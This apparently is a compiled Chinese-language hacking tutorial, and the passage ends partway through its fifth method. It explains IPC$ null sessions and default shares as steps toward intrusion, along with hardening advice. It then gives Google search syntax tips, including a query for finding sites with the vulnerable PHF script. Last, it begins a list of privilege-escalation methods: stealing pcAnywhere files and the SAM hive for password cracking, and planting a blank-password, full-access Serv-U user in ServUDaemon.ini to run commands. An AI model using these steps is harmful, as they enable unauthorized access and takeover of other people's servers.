      以上四者的關系可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進行特別的說明,其實我理解的也不是很透徹,都是在與大家交流中總結出來的.(一個有良好討論氛圍的BBS可以說是菜鳥的天堂)
      ipc$與空連接
      不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進行ipc$連接),自然就不能叫做空連接了.
      許多人可能要問了,既然可以空連接,那我以后就空連接好了,為什么還要費九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當你以空連接登陸時,你沒有任何權限(很郁悶吧),而你以用戶或管理員的身份登陸時,你就會有相應的權限(有權限誰不想呀,所以還是老老實實掃吧,不要偷懶喲).
      ipc$與139,445端口
      ipc$連接可以實現遠程登陸及對默認共享的訪問;而139端口的開啟表示netbios協議的應用,我們可以通過139,445(win2000)端口實現對共享文件/打印機的訪問,因此一般來講,ipc$連接是需要139或445端口來支持的.
      ipc$與默認共享
      默認共享是為了方便管理員遠程管理而默認開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問(前提是對方沒有關閉這些默認共享)
      ipc$連接失敗的原因
      以下5個原因是比較常見的:
      1)你的系統不是NT或以上操作系統;
      2)對方沒有打開ipc$默認共享
      3)對方未開啟139或445端口(惑被防火墻屏蔽)
      4)你的命令輸入有誤(比如缺少了空格等)
      5)用戶名或密碼錯誤(空連接當然無所謂了)
      另外,你也可以根據返回的錯誤號分析原因:
      錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員權限的,先提升權限;
      錯誤號51,Windows 無法找到網絡路徑 : 網絡有問題;
      錯誤號53,找不到網絡路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火墻(端口過濾);
      錯誤號67,找不到網絡名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
      錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。
      錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
      錯誤號1792,試圖登錄,但是網絡登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)
      錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。
      關于ipc$連不上的問題比較復雜,除了以上的原因,還會有其他一些不確定因素,在此本人無法詳細而確定的說明,就靠大家自己體會和試驗了.
      如何打開目標的IPC$
      首先你需要獲得一個不依賴于ipc$的shell,比如sql的cmd擴展、telnet、木馬,當然,這shell必須是admin權限的,然后你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上面可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行,沒有就啟動它(不知道怎么做的請看net命令的用法),還是不行的話(比如有防火墻,殺不了)建議放棄。
      如何防范ipc$入侵
      禁止空連接進行枚舉(此操作并不能阻止空連接的建立,引自《解剖win2000下的空會話》)
      首先運行regedit,找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:00000001(如果設置為2的話,有一些問題會發生,比如一些WIN的服務出現問題等等)
      禁止默認共享1)察看本地共享資源運行-cmd-輸入net share
      2)刪除共享(每次輸入一個)
        net share ipc$ /delete
        net share admin$ /delete
        net share c$ /delete
        net share d$ /delete(如果有e,f,……可以繼續刪除)
      3)停止server服務
        net stop server /y (重新啟動后server服務會重新開啟)
      4)修改注冊表
      運行-regedit
      server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
      pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。
      如果上面所說的主鍵不存在,就新建(右擊-新建-雙字節值)一個主健再改鍵值。
      永久關閉ipc$和默認共享依賴的服務:lanmanserver即server服務
      控制面板-管理工具-服務-找到server服務(右擊)-屬性-常規-啟動類型-已禁用
      安裝防火墻(選中相關設置),或者端口過濾(濾掉139,445等),或者用新版本的優化大師
      設置復雜密碼,防止通過ipc$窮舉密碼

    問:

    請問下~IPC空連接~有什么用啊?請問下~IPC空連接~有什么用???
    這么才可以取得更高的權利呢??

    答:首先需要指出的是空連接和ipc$是不同的概念。空連接是在沒有信任的情況下與服務器建立的會話,換句話說,它是一個到服務器的匿名訪問。ipc$是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限。有許多的工具必須用到ipc$。默認共享是為了方便遠程管理而開放的共享,包含了所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。
    IPC$(Internet Process Connection)是共享"命名管道"的資源,它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。利用IPC$,連接者甚至可以與目標主機建立一個空的連接而無需用戶名與密碼(當然,對方機器必須開了ipc$共享,否則你是連接不上的),而利用這個空的連接,連接者還可以得到目標主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)。我們總在說ipc$漏洞ipc$漏洞,其實,ipc$并不是真正意義上的漏洞,它是為了方便管理員的遠程管理而開放的遠程網絡登陸功能,而且還打開了默認共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。所有的這些,初衷都是為了方便管理員的管理,但好的初衷并不一定有好的收效,一些別有用心者(到底是什么用心?我也不知道,代詞一個)會利用IPC$,訪問共享資源,導出用戶列表,并使用一些字典工具,進行密碼探測,寄希望于獲得更高的權限,從而達到不可告人的目的.
      解惑:
      1)IPC連接是Windows NT及以上系統中特有的遠程網絡登陸功能,其功能相當于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函數,所以不能在Windows 9.x中運行。也就是說只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假,不過現在都2003年了,建議98的同志換一下系統吧,98不爽的)
      2)即使是空連接也不是100%都能建立成功,如果對方關閉了ipc$共享,你仍然無法建立連接
      3)并不是說建立了ipc$連接就可以查看對方的用戶列表,因為管理員可以禁止導出用戶列表
      建立ipc$連接在hack攻擊中的作用
      就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),訪問部分共享,如果你能夠以某一個具有一定權限的用戶身份登陸的話,那么你就會得到相應的權限,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!!
      (基本上可以總結為獲取目標信息、管理目標進程和服務,上傳木馬并運行,如果是2000server,還可以考慮開啟終端服務方便控制.怎么樣?夠厲害吧!)
      不過你也不要高興的太早,因為管理員的密碼不是那么好搞到的,雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數,而且現在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的:(
      因此今后你最大的可能就是以極小的權限甚至是沒有權限進行連接,你會慢慢的發現ipc$連接并不是萬能的,甚至在主機不開啟ipc$共享時,你根本就無法連接.
      所以我認為,你不要把ipc$入侵當作終極武器,不要認為它戰無不勝,它就像是足球場上射門前的傳球,很少會有致命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連接在hack入侵中的意義所在.

    第五部分
    GOOGLE搜索秘籍

    一,GOOGLE簡介

    Google(www.google.com)是一個搜索引擎,由兩個斯坦福大學博士生Larry Page與Sergey Brin于1998年9月發明,Google Inc. 于1999年創立。2000年7月份,Google替代Inktomi成為Yahoo公司的搜索引擎,同年9月份,Google成為中國網易公司的搜索引擎。98年至今,GOOGLE已經獲得30多項業界大獎。

    二,GOOGLE特色

    GOOGLE支持多達132種語言,包括簡體中文和繁體中文;
    GOOGLE網站只提供搜索引擎功能,沒有花里胡哨的累贅;
    GOOGLE速度極快,據說有8000多臺服務器,200多條T3級寬帶;

    GOOGLE的專利網頁級別技術PageRank能夠提供高命中率的搜索結果;
    GOOGLE的搜索結果摘錄查詢網頁的部分具體內容,而不僅僅是網站簡介;
    GOOGLE智能化的“手氣不錯”功能,提供可能最符合要求的網站;
    GOOGLE的“網頁快照”功能,能從GOOGLE服務器里直接取出緩存的網頁。

    三,基本搜索:+,-,OR

    GOOGLE無需用明文的“+”來表示邏輯“與”操作,只要空格就可以了。

    示例:搜索所有包含關鍵詞“易筋經”和“吸星大法”的中文網頁
    搜索:“易筋經 吸星大法”
    結果:已搜索有關易筋經 吸星大法的中文(簡體)網頁。共約有726項查詢結果,這是第1-10項。搜索用時0.13秒。

    注意:文章中搜索語法外面的引號僅起引用作用,不能帶入搜索欄內。

    GOOGLE用減號“-”表示邏輯“非”操作。

    示例:搜索所有包含“易筋經”而不含“吸星大法”的中文網頁
    搜索:“易筋經 -吸星大法”
    結果:已搜索有關易筋經 -吸星大法的中文(簡體)網頁。共約有5,440項查詢結果,這是第1-10項。搜索用時0.13秒。

    注意:這里的“+”和“-”號,是英文字符,而不是中文字符的“+”和“-”。此外,操作符與作用的關鍵字之間,不能有空格。比如“易筋經 - 吸星大法”,搜索引擎將視為邏輯“與”操作,中間的“-”被忽略。

    GOOGLE用大寫的“OR”表示邏輯“或”操作。但是,關鍵字為中文的或查詢似乎還有BUG,無法得到正確的查詢結果。

    示例:搜索包含布蘭妮“Britney”或者披頭士“Beatles”、或者兩者均有的中文網頁。
    搜索:“britney OR beatles”
    結果:已搜索有關britney OR beatles的中文(簡體)網頁。共約有14,600項查詢結果,這是第1-10項。搜索用時0.08秒。
    搜索:“布蘭妮 OR 披頭士”
    結果:找不到和您的查詢-布蘭妮 OR 披頭士-相符的網頁。

    注意:小寫的“or”,在查詢的時候將被忽略;這樣上述的操作實際上變成了一次“與”查詢。

    “+”和“-”的作用有的時候是相同的,都是為了縮小搜索結果的范圍,提高查詢結果命中率。

    例:查閱天龍八部具體是哪八部。

    分析:如果光用“天龍八部”做關鍵字,搜索結果有26,500項,而且排前列的主要與金庸的小說《天龍八部》相關,很難找到所需要的資訊??梢杂脙蓚€方法減少無關結果。

    1,如果你知道八部中的某一部,比如阿修羅,增加“阿修羅”關鍵字,搜索結果就只有995項,可以直接找到全部八部,“天龍八部 阿修羅”。

    2,如果你不知道八部中的任何一部,但知道這與佛教相關,可以排除與金庸小說相關的記錄,查詢結果為1,010項,可以迅速找到需要的資料,“天龍八部 佛教 -金庸”。

    四,輔助搜索:通配符、大小寫、句子、忽略字符以及強制搜索

    GOOGLE不支持通配符,如“*”、“?”等,只能做精確查詢,關鍵字后面的“*”或者“?”會被忽略掉。

    GOOGLE對英文字符大小寫不敏感,“GOD”和“god”搜索的結果是一樣的。

    GOOGLE的關鍵字可以是詞組(中間沒有空格),也可以是句子(中間有空格),但是,用句子做關鍵字,必須加英文引號。

    示例:搜索包含“long, long ago”字串的頁面。
    搜索:“"long, long ago"”
    結果:已向英特網搜索"long, long ago". 共約有28,300項查詢結果,這是第1-10項。搜索用時0.28秒。

    注意:和搜索英文關鍵字串不同的是,GOOGLE對中文字串的處理并不十分完善。比如,搜索“"啊,我的太陽"”,我們希望結果中含有這個句子,事實并非如此。查詢的很多結果,“啊”、“我的”、“太陽”等詞語是完全分開的,但又不是“啊 我的 太陽”這樣的與查詢。顯然,GOOGLE對中文的支持尚有欠缺之處。

    GOOGLE對一些網路上出現頻率極高的詞(主要是英文單詞),如“i”、“com”,以及一些符號如“*”、“.”等,作忽略處理,如果用戶必須要求關鍵字中包含這些常用詞,就要用強制語法“+”。

    示例:搜索包含“Who am I ?”的網頁。如果用“"who am i ?"”,“Who”、“I”、“?”會被省略掉,搜索將只用“am”作關鍵字,所以應該用強制搜索。
    搜索:“"+who +am +i"”
    結果:已向英特網搜索"+who +am +i". 共約有362,000項查詢結果,這是第1-10項。搜索用時0.30秒。

    注意:英文符號(如問號,句號,逗號等)無法成為搜索關鍵字,加強制也不行。

    五,高級搜索:site,link,inurl,allinurl,intitle,allintitle

    “site”表示搜索結果局限于某個具體網站或者網站頻道,如“sina.com.cn”、“edu.sina.com.cn”,或者是某個域名,如“com.cn”、“com”等等。如果是要排除某網站或者域名范圍內的頁面,只需用“-網站/域名”。

    示例:搜索中文教育科研網站(edu.cn)上所有包含“金庸”的頁面。
    搜索:“金庸 site:edu.cn”
    結果:已搜索有關金庸 site:edu.cn的中文(簡體)網頁。共約有2,680項查詢結果,這是第1-10項 。搜索用時0.31秒。

    示例:搜索包含“金庸”和“古龍”的中文新浪網站頁面,
    搜索:“金庸 古龍 site:sina.com.cn”
    結果:已在sina.com.cn搜索有關金庸 古龍的中文(簡體)網頁。共約有869項查詢結果,這是第1-10項。搜索用時0.34秒。

    注意:site后的冒號為英文字符,而且,冒號后不能有空格,否則,“site:”將被作為一個搜索的關鍵字。此外,網站域名不能有“http”以及“www”前綴,也不能有任何“/”的目錄后綴;網站頻道則只局限于“頻道名.域名”方式,而不能是“域名/頻道名”方式。諸如“金庸 site:edu.sina.com.cn/1/”的語法是錯誤的。

    “link”語法返回所有鏈接到某個URL地址的網頁。

    示例:搜索所有含指向華軍軟件園“www.newhua.com”鏈接的網頁。
    搜索:“link:www.newhua.com
    結果:搜索有鏈接到www.newhua.com的網頁。共約有695項查詢結果,這是第1-10項。搜索用時0.23秒。

    注意:“link”不能與其他語法相混合操作,所以“link:”后面即使有空格,也將被GOOGLE忽略。

    inurl語法返回的網頁鏈接中包含第一個關鍵字,后面的關鍵字則出現在鏈接中或者網頁文檔中。有很多網站把某一類具有相同屬性的資源名稱顯示在目錄名稱或者網頁名稱中,比如“MP3”、“GALLARY”等,于是,就可以用INURL語法找到這些相關資源鏈接,然后,用第二個關鍵詞確定是否有某項具體資料。INURL語法和基本搜索語法的最大區別在于,前者通常能提供非常精確的專題資料。

    示例:查找MIDI曲“滄海一聲笑”。
    搜索:“inurl:midi 滄海一聲笑”
    結果:已搜索有關inurl:midi 滄海一聲笑的中文(簡體)網頁。共約有14項查詢結果,這是第1-10項。搜索用時0.01秒。

    示例:查找微軟網站上關于windows2000的安全課題資料。
    搜索:“inurl:security windows2000 site:microsoft.com”
    結果:已在microsoft.com內搜索有關 inurl:security windows2000的網頁。共約有198項查詢結果,這是第1-10項。搜索用時0.37秒。

    注意:“inurl:”后面不能有空格,GOOGLE也不對URL符號如“/”進行搜索。GOOGLE對“cgi-bin/phf”中的“/”當成空格處理。

    allinurl語法返回的網頁的鏈接中包含所有查詢關鍵字。這個查詢的對象只集中于網頁的鏈接字符串。

    示例:查找可能具有PHF安全漏洞的公司網站。通常這些網站的CGI-BIN目錄中含有PHF腳本程序(這個腳本是不安全的),表現在鏈接中就是“域名/cgi-bin/phf”。
    語法:“allinurl:"cgi-bin" phf +com”
    搜索:已向英特網搜索allinurl:"cgi-bin" phf +com. 共約有40項查詢結果,這是第1-10項。搜索用時0.06秒。

    allintitle和intitle的用法類似于上面的allinurl和inurl,只是后者對URL進行查詢,而前者對網頁的標題欄進行查詢。網頁標題,就是HTML標記語言title中之間的部分。網頁設計的一個原則就是要把主頁的關鍵內容用簡潔的語言表示在網頁標題中。因此,只查詢標題欄,通常也可以找到高相關率的專題頁面。

    示例:查找日本明星藤原紀香的照片集。
    搜索:“intitle:藤原紀香 寫真”
    結果:已搜索有關intitle:藤原紀香 寫真的中文(簡體)網頁。共約有284項查詢結果,這是第1-10項。搜索用時0.03秒。

    GOOGLE的罕用高級搜索語法:related,cache,info

    related用來搜索結構內容方面相似的網頁。例:搜索所有與中文新浪網主頁相似的頁面(如網易首頁,搜狐首頁,中華網首頁等),“related:www.sina.com.cn/index.shtml”。

    cache用來搜索GOOGLE服務器上某頁面的緩存,這個功能同“網頁快照”,通常用于查找某些已經被刪除的死鏈接網頁,相當于使用普通搜索結果頁面中的“網頁快照”功能。

    info用來顯示與某鏈接相關的一系列搜索,提供cache、link、related和完全包含該鏈接的網頁的功能。

    示例:查找和新浪首頁相關的一些資訊。
    搜索:“info:www.sina.com.cn
    結果:有關www.sina.com.cn的網頁信息。
    新浪首頁
    北京站 上海站 廣東站. ... 游戲世界, |, 影音娛樂, |, Club緣, |, 男
    人女人, |, 論壇聊天, |, 時尚潮流, |, 文教育兒, |, 車行天下, |,
    軟件下載. ...
    Google 提供這個網址的信息:
    查看Google網頁快照里www.sina.com.cn的存檔
    尋找和www.sina.com.cn類似的網頁
    尋找網頁有鏈接到www.sina.com.cn
    尋找網頁包含有'www.sina.com.cn'

    六,其他重要功能

    目錄服務

    如果不想搜索網頁,而是想尋找某些專題網站,可以訪問GOOGLE的分類目錄“http://directory.google.com/”,中文目錄是“http://directory.google.com/Top/World/Chinese_Simplified/”。不過由于GOOGLE的目錄由志愿者服務,而GOOGLE在國內名氣相對比較小,因此中文目錄下收錄站點很少。

    工具條

    為了方便搜索者,GOOGLE提供了工具條,集成于瀏覽器中,用戶無需打開GOOGLE主頁就可以在工具條內輸入關鍵字進行搜索。此外,工具條還提供了其他許多功能,如顯示頁面PageRank等。最方便的一點在于用戶可以快捷的在GOOGLE主頁、目錄服務、新聞組搜索、高級搜索和搜索設定之間切換。欲安裝GOOGLE的工具條,可以訪問“http://toolbar.google.com/”,按頁面提示可以自動下載并安裝。

    新聞組(USENET)搜索

    新聞組中有大量的有價值信息,DEJA一直是新聞組搜索引擎中的佼佼者。2001年2月份,GOOGLE將DEJA收購并提供了所有DEJA的功能?,F在,除了搜索之外,GOOGLE還支持新聞組的WEB方式瀏覽和張貼功能。

    輸入“http://groups.google.com/”后,便進入GOOGLE新聞組界面。可惜現在還沒有中文界面。因為新聞組中的帖子實在是多,所以我點擊“Advaced Groups Search”進入高級搜索界面http://groups.google.com/advanced_group_search。新聞組高級搜索界面提供對關鍵字、新聞組、主題、作者、帖子序號、語言和發布日期的條件搜索。其中作者項指作者發帖所用的唯一識別號電子信箱。比如要在alt.chinese.text內搜索著名老牌網絡寫手圖雅的帖子,可以用下列指令“group:alt.chinese.text author:tuya@ccmail.uoregon.edu”。不過一般而言,我更推薦使用圖形搜索界面,方便而且直觀。

    搜索結果翻譯

    曾經為那些你不懂的法文、西班牙文頁面煩惱么?現在,GOOGLE支持一項搜索結果翻譯功能,可以把非英文的搜索結果翻譯成英文?。‰m然目前只支持有限的拉丁語、法語、西班牙語、德語和葡萄牙文,但是我不得不承認,這是個偉大的改進。

    不過,目前只能在英文狀態GOOGLE下實現這個功能。進入GOOGLE的設置頁面,http://www.google.com/preferences,有一個“BETA: Enable translation of search results into your interface language. ”的選項,把它選中,就OK了。

    搜索結果過濾

    網絡上的成人內容浩如煙海,而且很多站點具有欺騙或者其他不良企圖,瀏覽者很容易掉入其中的陷阱。為此,GOOGLE新設立了成人內容過濾功能,見GOOGLE的設置頁面,http://www.google.com/preferences,最底下有一個選項SafeSearch Filtering。不過,中文狀態下的GOOGLE尚沒有這個功能。

    PDF文檔搜索

    我對GOOGLE尤其欣賞的一點就是它提供對PDF文檔內文的檢索。目前GOOGLE檢索的PDF文檔大約有2500萬左右。這真是太美妙了。PDF是ADOBE公司開發的電子文檔格式,現在已經成為互聯網的電子化出版標準。PDF文檔通常是一些圖文并茂的綜合性文檔,提供的資訊一般比較集中全面。

    示例:搜索關于電子商務(ECOMMERCE)的PDF文檔。
    搜索:“inurl:pdf ecommerce”
    結果:已向英特網搜索inurl:pdf ecommerce. 共約有19,200項查詢結果,這是第1-10項。搜索用時0.11秒。

    下面是某項搜索結果:

    [PDF] www.usi.net/pdf/outsoucing-ecommerce.pdf
    Outsourcing Electronic Commerce Business Case White Paper By: John P. Sahlin, Product
    Marketing Professonial (PMP) Implementation Manager, Web Engineering ...
    一般文字檔 - 類似網頁

    可以看到,GOOGLE在PDF檔前加上了[PDF]的標記,而且,GOOGLE把PDF文件轉換成了文字檔,點擊“一般文字檔”,可以粗略的查看該PDF文檔的大致內容。當然,PDF原有的圖片以及格式是沒有了。

    圖像文檔搜索

    GOOGLE提供了Internet上圖像文件的搜索功能!!目前該功能尚在B測試階段,但已經非常好用。訪問地址是“images.google.com”。你可以在關鍵字欄位內輸入描述圖像內容的關鍵字,如“britney spears”,也可以輸入描述圖像質量或者其他屬性的關鍵字,如“high quality”。

    GOOGLE給出的搜索結果具有一個直觀的縮略圖(THUMBNAIL),以及對該縮略圖的簡單描述,如圖像文件名稱,以及大小等。點擊縮略圖,頁面分成兩禎,上禎是圖像之縮略圖,以及頁面鏈接,而下禎,則是該圖像所處的頁面。屏幕右上角有一個“Remove Frame”的按鈕,可以把框架頁面迅速切換到單禎的結果頁面,非常方便。GOOGLE還提供了對成人內容圖像的限制功能,可以讓搜索者免受不必要的騷擾。

    不過,非常遺憾的是,圖像搜索功能還不支持中文。

    七,搜索技巧雜談

    關鍵詞的選擇在搜索中起到決定性的作用,所有搜索技巧中,關鍵詞選擇是最基本也是最有效的。

    例一:查找《鏡花緣》一書中淑士國酒保的酸話原文。

    分析:如果按照一般的思路,找某部小說中的具體段落,就需要用搜索引擎先找到這本書,然后再翻到該段落。這樣做當然可以,但是效率很低。如果了解目標信息的構成,用一些目標信息所特有的字詞,可以非常迅速的查到所需要的資料。也就是說,高效率的搜索關鍵字不一定就是目標信息的主題。在上面的例子中,酒保談到酒的濃淡與貴賤的關系時,之乎者也橫飛。因此,可以用特定的詞語一下子找到目標資料。

    搜索:“酒 貴 賤 之”,OK,找到的第一條信息就是鏡花緣的這一段落:“先生聽者:今以酒醋論之,酒價賤之,醋價貴之。因何賤之?為甚貴之?真所分之,在其味之。酒昧淡之,故而賤之;醋味厚之,所以貴之。...”

    以上的關鍵字選擇技巧可以謂之“特定詞法”。

    例二:“黃花閨女”一詞中“黃花”是什么意思。

    分析:“黃花閨女”是一個約定的俗語,如果只用“黃花閨女 黃花”做關鍵詞,搜索結果將浩如煙海,沒什么價值,因此必須要加更多的關鍵詞,約束搜索結果。選擇什么關鍵詞好呢?備選的有“意思”、“含義”、“來歷”、“由來”、“典故”、“出典”、“淵源”等,可以猜到的是,類似的資料,應該包含在一些民俗介紹性的文字里,所以用諸如“來歷”、“由來”、“出典”等詞匯的概率更高一些。

    搜索:“黃花閨女 黃花 由來”,查到“黃花”原來出典于《太平御覽》,與南朝的壽陽公主相關。如果想獲得第一手資料,那就可以用“太平御覽 壽陽公主”做搜索了。

    以上的關鍵字選擇技巧可以謂之“近義詞法”。

    例三:劉德華同志的胸圍是多少。

    分析:首先聲明,這是某個MM要我做的搜索,我把它作為搜索案例而已,沒其他的意思。非常直接的搜索是,“劉德華 胸圍”,但事實上,這么搜索出來的結果,盡是一些諸如“劉德華取笑莫文蔚胸圍太小”之類的八卦新聞,無法快速得到所需要的資料。可以想到的是,需要的資料應該包含在劉德華的全面介紹性文字中,除了胸圍,應該還包括他的身高,體重,生日等一系列相關信息。OK,這樣就可以進一步的增加其他約束性關鍵詞以縮小搜索范圍。

    搜索:“劉德華 胸圍 身高”,沒有料到的情況發生了,網上炙手可熱的痞子蔡《第一次親密接觸》里居然含有這樣關鍵字,阿泰“改編自劉德華《忘情水》的變態歪歌”、“用身高體重三圍和生日來加以編號”。好辦,把這部小說去掉,“劉德華 胸圍 身高 -阿泰”,OK,結果出來了,華仔胸圍84cm。說明一下,為什么用“阿泰”而不用“第一次親密接觸”呢?這是因為小說的名字被轉載的時候可能有變動,但里面角色的名字是不會變的。

    以上的關鍵字選擇技巧可以謂之“相關詞法”。

    其他常用搜索個案

    例一:找人

    分析:一個人在網上揭示的資料通常有:姓名,網名,性別,年齡,畢業學校,工作單位,外號,住址,電話,信箱,BP,手機號碼,ICQ號,OICQ號等等。所以,如果你要了解一下你多年沒見過的同學,那不妨用上述信息做關鍵字進行查詢,也許會有大的收獲。

    例二:找軟件

    分析一:最簡單的搜索當然就是直接以軟件名稱以及版本號為關鍵字查詢。但是,僅僅有軟件名稱和目標網站,顯然還不行,因為搜索到的可能是軟件的相關新聞。應該再增加一個關鍵字??紤]到下載頁面上常有“點擊此處下載”或者“download”的提示語,因此,可以增加“下載”或者“download”為關鍵字。
    搜索:“winzip 8.0 下載”
    結果:已搜索有關winzip 8.0 下載的中文(簡體)網頁。共約有6,670項查詢結果,這是第1-10項。搜索用時0.22秒。

    分析二:很多網站設有專門的下載目錄,而且就命名為“download”,因此,可以用INURL語法直接搜索這些下載目錄。
    搜索:“winzip 8.0 inurl:download”
    結果:已搜索有關winzip 8.0 inurl:download的中文(簡體)網頁。共約有358項查詢結果,這是第1-10項。搜索用時0.44秒。

    在互聯網上隨意的下載軟件是不安全的,因為供下載的軟件有可能帶有病毒或者捆綁了木馬,所以,對下載網站作一個限定,是一個穩妥的思路。可以用SITE語法達到這個目的。

    共享軟件下載完之后,使用的時候,軟件總跳出警示框,或者軟件的功能受到一定限制。由于中國的網民多是窮棒子,所以應該再找一個注冊碼。找注冊碼,除了軟件的名稱和版本號外,還需要有諸如“serial number”、“sn”、“序列號”等關鍵字?,F在,來搜索一下winzip8.0的注冊碼。
    搜索:“winzip 8.0 sn”
    結果:已向英特網搜索winzip 8.0 sn. 共約有777項查詢結果,這是第1-10項。搜索用時0.30秒。

    例三:找圖片

    除了GOOGLE提供的專門圖片搜索功能,還可以組合使用一些搜索語法,達到圖片搜索之目的。

    分析一:專門的圖片集合,提供圖片的網站通常會把圖片放在某個專門目錄下,如“gallary”、“album”、“photo”、“image”等。這樣就可以使用INURL語法迅速找到這類目錄?,F在,試著找找小甜甜布蘭妮的照片集。
    搜索:“"britney spears" inurl:photo”
    結果:已向英特網搜索"britney spears" inurl:photo. 共約有2,720項查詢結果,這是第1-10項。搜索用時0.23秒。

    分析二:提供圖片集合的網頁,在標題欄內通常會注明,這是誰誰的圖片集合。于是就可以用INTITLE語法找到這類網頁。
    搜索:“intitle:"britney spears" picture”
    結果:已向英特網搜索intitle:"britney spears" picture. 共約有317項查詢結果,這是第1-10項。搜索用時0.40秒。

    分析三:明星的FANS通常會申請免費個人主頁來存放他們偶像的靚照。于是用SITE語法指定某免費主頁提供站點,是個迅速找到圖片的好辦法。
    搜索:“"britney spears" site:geocities.com”
    結果:已在geocities.com內搜索有關"britney spears"的網頁。共約有5,020項查詢結果,這是第1-10項。搜索用時0.47秒。

    例四:找MP3

    分析一:提供MP3的網站,通常會建立一個叫做MP3的目錄,目錄底下分門別類的存放各種MP3樂曲。所以,可以用INURL語法迅速找到這類目錄?,F在用這個辦法找找老歌“say you say me”。
    搜索:“"say you say me" inurl:mp3”
    結果:已向英特網搜索inurl:mp3 "say you say me". 共約有155項查詢結果,這是第1-10項。搜索用時0.17秒。

    分析二:也可以通過網頁標題,找到這類提供MP3的網頁。
    搜索:“"say you say me" intitle:mp3”
    結果:已向英特網搜索"say you say me" intitle:mp3. 共約有178項查詢結果,這是第1-10項。搜索用時0.73秒。

    當然,如果你知道某個網站的下載速度快,而且樂曲全,就可以用SITE語法先到該網站上看看有沒有目標樂曲。

    例五:找書

    分析一:對我而言,常訪問的電子圖書館類網站就那么幾個,比如文藝類的“www.shuku.net”。于是可以用SITE語法很簡單的找到某本書(如果該網站上有的話)。比如,“舊唐書 site:shuku.net”,就可以馬上找到該書。如果沒有,通常別的網站上也很難找到。因此,找書的關鍵,是你了解一大批著名的圖書館網站。

    分析二:我上面介紹的第一項關鍵字選擇技巧特定詞法,對于迅速找到某書或者文章也是極其有用的,當然,這得建立在你已經讀過該書,對書的內容有印象的基礎上。比如如果了解堂吉訶德一書戰風車的大致內容,就可以用“吉訶德 風車 桑喬”迅速找到該書。

    九,GOOGLE搜索FAQ

    Q:如何全面的了解google.com?
    A:查看網站相關頁面“http://www.google.com/about.html”。

    Q:如何切換google.com的初始語言界面?
    A:點擊搜索欄右邊的“使用偏好”(Preferences),選擇“界面語言”(Interface Language)中你期望的語言,點擊最下面的“設定使用偏好”(Save Preferences)按鈕。需要提醒的是,GOOGLE用cookie記錄這個偏好,所以如果你把瀏覽器的cookie功能關掉,就無法進行設定。

    Q:如何設定每頁搜索結果顯示數量?
    A:同上,進入使用偏好,在該頁的“查看結果”(Number of Results)選擇顯示結果數,數目越大,顯示結果需要的時間越長,默認是10項。

    Q:搜索到的鏈接無法打開怎么辦?
    A:鏈接無法打開的原因很多,比如網站當機,或者ISP過濾等,可以點擊GOOGLE的“網頁快照”查看在GOOGLE服務器上的網頁緩存。

    Q:打開搜索結果的鏈接,可是該頁面太大,很難找到一下子找到目的資料怎么辦?
    A:直接打開“網頁快照”,GOOGLE會把關鍵詞用不同顏色標記出來,很容易找到。

    第六部分
    21種RING的提權方法
    好多都沒有成功,還是發來看看,看看思路,呵呵

    以下全部是本人提權時候的總結 很多方法至今沒有機會試驗也沒有成功,但是我是的確看見別人成功過的。本人不才,除了第一種方法自己研究的,其他的都是別人的經驗總結。希望對朋友有幫助!

    1.radmin連接法

    條件是你權限夠大,對方連防火墻也沒有。封裝個radmin上去,運行,開對方端口,然后radmin上去。本人從來米成功過。,端口到是給對方打開了。

    2.paanywhere

    C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這里下他的GIF文件,在本地安裝pcanywhere上去

    3.SAM破解

    C:\WINNT\system32\config\ 下他的SAM 破解之

    4.SU密碼奪取

    C:\Documents and Settings\All Users\「開始」菜單\程序\

    引用:Serv-U,然后本地查看屬性,知道路徑后,看能否跳轉
        進去后,如果有權限修改ServUDaemon.ini,加個用戶上去,密碼為空
    [USER=WekweN|1]
    Password=
    HomeDir=c:\
    TimeOut=600
    Maintenance=System
    Access1=C:\|RWAMELCDP
    Access1=d:\|RWAMELCDP
    Access1=f:\|RWAMELCDP
    SKEYValues=
        這個用戶具有最高權限,然后我們就可以ftp上去 quote site exec xxx 來提升權限

    5.c:\winnt\system32\inetsrv\data\

